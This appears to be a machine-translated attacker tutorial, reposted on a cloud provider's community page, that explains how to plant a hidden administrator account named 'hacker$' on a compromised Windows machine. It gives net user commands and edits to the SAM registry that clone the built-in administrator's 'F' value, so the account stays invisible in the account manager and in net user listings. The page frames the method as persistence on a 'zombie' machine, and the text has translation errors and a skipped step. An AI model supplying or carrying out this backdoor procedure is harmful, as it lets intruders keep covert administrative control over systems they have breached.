Create a hidden superuser

Source: Internet
Author: User
1. Assume that we log on to a zombie with terminal services as a Super User administrator. First, create an account under the command line or account manager: hacker $, here I create this account under the command line

Net user hacker $1234/Add

2. Enter regedt32.exein the "Start/Run" command to run regedt32.exe.

3. Click "permission" and a window will pop up.

Click Add to add the account I logged on to the security bar. Here I log on as administrator, So I add the Administrator and set the permission to "full control ". Note: It is best to add the account you are logged on to or the group in which the account is located. do not modify the original account or group. Otherwise, a series of unnecessary problems may occur. And then click here to delete the account you added.

4. Click "start"> "run" and enter "regedit.exe" to go back to start the Registration Table editor regedit.exe.

Open key: hkey_local_maichine \ SAM \ Domains \ ACCOUNT \ User \ names \ hacker $"

5. Export the items hacker $, 00000409, and 000001f4 as hacker. reg, 409.reg, 1f4. reg. use NotePad to edit the exported files respectively, and copy the value of the key "F" under the "000001f4" of the Super User, overwrite the value of the key "F" under item 00000409 corresponding to hacker $, and then replace 00000409. reg and hacker. reg merge.

6. Execute net user hacker $/del on the command line to delete user hacker $: Net user hacker $/del

7. In the regedit.exe window, press F5 to refresh, and then press file-import registry file to import modified hacker. reg to registry.

The hacker of the hidden Super User has been created. Then, disable regedit.exe. In the regedt32.exe window, change the HKEY_LOCAL_MACHINE \ SAM Key Permission to the original one (you only need to delete the added account administrator ).

9. Note: After a hidden superuser is created, the hacker $ user cannot be seen in the account manager, and the hacker $ user cannot be seen in the command line by running the "Net user" command, but after the superuser is created, you cannot change the password any more. If you use the net user command to change the password of hacker $, you will be able to see this hidden super user in the account manager and cannot delete it.

# Operating System

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.